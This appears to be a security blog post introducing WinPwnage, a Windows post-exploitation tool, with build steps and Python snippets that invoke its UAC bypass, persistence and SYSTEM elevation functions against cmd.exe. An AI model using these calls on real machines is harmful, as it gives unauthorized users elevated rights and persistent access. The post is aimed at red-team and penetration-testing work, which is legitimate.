Offensive Security Tool: WinPwnage

by | Nov 4, 2022 | Tools

WinPwnage

Post Views: 2,449

Premium Content

Patreon
Subscribe to Patreon to watch this episode.

Reading Time: 3 Minutes

WinPwnage

WinPwnage by rootm0s is a tool that allows you to perform UAC bypass, Elevate, and Persistence methods for advanced Post-Exploitation attacks.

Shell is just the beginning, any red team knows that once you gain access and you get a shell, then what? Some of the first things you would want to do are bypass UAC if enabled, perform privilege escalation to become a more powerful user, and create persistence, so that if you lose access, you can always get back in.

This tool allows you to do all that, with sophisticated techniques that actually work well on any Microsoft Windows Operating System, because the issues are by design, and these techniques take advantage of the flaws.

See Also: So you want to be a hacker?
Complete Offensive Security and Ethical Hacking Course

 

Building

This build works on Python >= 3.6 and puts the .exe file into the dist directory. Install pyinstaller using pip command:

pip install pyinstaller

 

And run the following command:

pyinstaller --onefile main.py

 

Trending: Offensive Security Tool: Monkey365

Trending: Offensive Security Tool: LAZYPARIAH

 

Scanning

Compares build number against ‘Fixed In’ build numbers and displays the results.

main.py --scan uac

main.py --scan persist

main.py --scan elevate

 
 
Example results when scanning for possible UAC methods
 
Example Results
 

Trending: Exploit XSS Injections in a one-line powerful Technique

 

Importing

Bypass UAC using uacMethod2

from winpwnage.functions.uac.uacMethod2 import uacMethod2

uacMethod2(["c:\\windows\\system32\\cmd.exe", "/k", "whoami"])

Persist on system using persistMethod4

from winpwnage.functions.persist.persistMethod4 import persistMethod4

persistMethod4(["c:\\windows\\system32\\cmd.exe", "/k", "whoami"], add=True)

# Removal

persistMethod4(["c:\\windows\\system32\\cmd.exe", "/k", "whoami"], add=False)

Elevate from administrator to SYSTEM using elevateMethod1

from winpwnage.functions.elevate.elevateMethod1 import elevateMethod1

elevateMethod1(["c:\\windows\\system32\\cmd.exe", "/k", "whoami"])

 

 

UAC bypass techniques

Functions

Persistence Techniques

Functions

Elevation Techniques

Functions

 

DISCLAIMER

This tool is intended to be used only in authorized circumstances by qualified penetration testers, security researchers and red team professionals. Before downloading, installing or using this tool, ensure that you understand the relevant laws in your jurisdiction. The author of this tool does not endorse, encourage or condone the use of this tool for illegal or unauthorized purposes.

Clone the repo from here: GitHub Link

 

Trending: Article: Using VPS for Bug Bounty, comparing VPS providers

Merch

Recent Tools

Offensive Security & Ethical Hacking Course

Begin the learning curve of hacking now!

Information Security Solutions

Find out how Pentesting Services can help you.

Join our Community

Share This